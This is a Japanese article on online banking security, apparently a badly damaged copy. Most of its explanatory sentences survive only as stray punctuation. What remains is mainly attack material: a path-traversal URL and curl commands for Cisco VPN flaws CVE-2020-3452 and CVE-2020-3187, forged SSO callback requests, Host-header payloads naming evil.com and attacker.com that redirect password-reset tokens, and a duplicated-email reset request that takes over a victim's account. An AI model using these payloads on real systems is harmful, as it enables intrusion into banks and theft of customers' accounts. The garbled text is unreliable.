オンラインバンキングのセキュリティ問題

皆さん、こんにちは!





今日は、銀行システムのセキュリティの差し迫った問題について話し、一般的な脆弱性を分析し、現在の問題に基づいて結論を導き出します。





重要

繰り返しになりますが、作成者は、サイバー脅威からシステムを完全に保護する方法を示すことを保証するものではなく、注意を払う必要のある問題を示すことだけを望んでいます。





1. SSLVPNサービス

銀行は、Cisco SSLVPNサービスを使用して内部ネットワークへのリモートアクセスを整理することがよくあります。





, .. Cisco CVE-2020-3452 CVE-2020-3187





1.1. CVE-2020-3452

CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .









https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../









, .





1.2. CVE-2020-3187





/session_password.html 200





curl -k -s -i https://



Cisco-VPN/+CSCOE+/session_password.html







200? -





"/+CSCOU+/csco_logo.gif"







curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://



Cisco-VPN/+CSCOE+/session_password.html







VPN .





2. & OAuth

- (SSO) OAuth 2.0, , , .





GET /auth/sso/cb?code=[sso token account] HTTP/1.1

Host: bank.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close









CSRF . - .





  1. SSO





  2. SSO ,





  3. .





  4. SSO .





redirect_uri - url . / .









POST https://bank.com/reset.php HTTP/1.1

Accept: /

Content-Type: application/json

Host: evil.com












Host: bank.com

X-Forwarded-Host: attacker.com












Host: target.com

Host: attacker.com








email .









https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901





- . , .





.





POST /resetPassword

[…]

email=victim@email.com&email=attacker@email.com








リクエストでは、攻撃者が単に電子メールパラメータを複製し、認証トークンの送信先となるメールを指定したことがわかります。





出力

SSL VPNでもGlobalProtectでも、サービスを最新の状態に保ちます。





認証を安全に保つ





また、ヒントとして、Webアプリケーションファイアウォール(WAF  )を使用して、 コードの変更によって引き起こされる脆弱性の悪用を防ぎます。





がんばろう!ではごきげんよう。








All Articles